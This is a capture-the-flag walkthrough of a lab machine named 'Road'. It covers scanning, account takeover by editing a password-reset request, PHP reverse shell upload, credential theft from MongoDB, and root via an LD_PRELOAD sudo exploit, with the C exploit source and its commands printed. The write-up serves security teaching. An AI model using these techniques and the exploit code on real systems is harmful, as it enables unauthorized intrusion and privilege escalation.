Road
Reconnaissance
We don't know anything about the machine yet, and CTF description doesn't reveal anything either, so let's start with an aggressive NMAP scan.
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 00:59 CET
Warning: 10.10.101.170 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.101.170
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
| 256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_ 256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sky Couriers
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 39.14 ms 10.8.0.1
2 39.27 ms 10.10.101.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.45 secondsWell, that really doesn't reveal much; pretty standard stuff.
Navigating a bit through the website I can't really find anything suspicious yet either, so let's throw a gobuster scan and see if we can get something.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.101.170/v2/admin
[+] Method: GET
[+] Threads: 30
[+] Wordlist: directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/23 01:05:40 Starting gobuster in directory enumeration mode
===============================================================
Progress: 136645 / 220561 (61.95%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/12/23 01:08:50 Finished
===============================================================Again, nothing special.
After reading some more source code, I coulnd't locate anything. So let's move onto actually using the website.
Scanning
After running gobuster again with a bigger wordlist, it finally found a register.html endpoint in /v2/admin. So let's try and see what we can do once logged in.
So we are greeted with a nicely designed dashboard, and going in my profile we are able to change some parameters of our account. But not image, as that looks like it's reserved for admin only. In the meanwhile, looks like they also leaked his email, so we will save that for later.
Digging a bit more, we see there's a reset user functionality that let's you change password, while username is greyed out. We all know greying a field in a form isn't enough to block malicious input though, as hackers can easily modify requests through burpsuite, so let's fire it.
Exploiting
Now we know the admin email, so let's try changing ours to that modifying the request with burpsuite repeater.
And looks like we are succesful, let's try to log in as now admins.
Worked, now let's abuse this image uploading tool to hopefully upload a php (as we already know this is what the backend uses) reverse shell and get access to the server.
I always get my php reverse shell from here, but you can use any.
Well, looks like it worked, as there is no negative feedback from the page.
Reading the source code, it exposes an important endpoint for this through a comment, and it is "/v2/profileimages/", so we can only guess we have to start a listener and navigate to "/v2/profileimages/ReverseShellName.php" to invoke the shell
Connection from 10.10.101.170:41246
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
00:40:10 up 44 min, 0 users, load average: 0.62, 0.22, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@sky:/$ export TERM=xterm; export SHELL=/bin/bash
export TERM=xterm; export SHELL=/bin/bash
www-data@sky:/$ ^Zfish: Job 1, 'nc -lvp 1337' has stopped
max@1337 ~> stty raw -echo;fg
Send job 1, “nc -lvp 1337” to foreground
www-data@sky:/$Finally we are in, you can go and grab the user flag at /home/webdeveloper/, but we need to do some lateral movement and get a real user instead of www-data, so let's move into privilege escalation.
Privilege Escalation
Looking at /etc/shadow, we can see there's a mongodb user, so let's see if we have access to the database.
> show dbs
shshow dbs
admin 0.000GB
backup 0.000GB
config 0.000GB
local 0.000GB
> use backup
ususe backup
switched to db backup
> show collections
shshow collections
collection
user
> db.user.find();
dbdb.user.find();
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
> exit
exexit
bye
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
www-data@sky:/var/www/html$ su webdeveloper
su webdeveloper
Password: BahamasChapp123!@#
webdeveloper@sky:/var/www/html$ Lateral movement was succesful, now let's see if we can get root this time.
Looking at sudo -l output, there's something suspicious I notice other than the binary we can execute as sudo, and it is the LD_PRELOAD environment variable.
Looking at this article, it looks like it could be vulnerable, so let's try their C code example.
#include [stdio.h]
#include [sys/types.h]
#include [stdlib.h]
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
exploit.c: In function ‘_init’:
exploit.c:6:1: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
6 | setgid(0);
| ^~~~~~
exploit.c:7:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
7 | setuid(0);
| ^~~~~~
webdeveloper@sky:/tmp$ sudo -l
sudo -l
Matching Defaults entries for webdeveloper on sky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
env_keep+=LD_PRELOAD
User webdeveloper may run the following commands on sky:
(ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:/tmp$ sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/sky_backup_utility
sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/sky_backup_utility
# id
id
uid=0(root) gid=0(root) groups=0(root)
# And that's it, now just go and grab root flag. Hope you enjoyed it!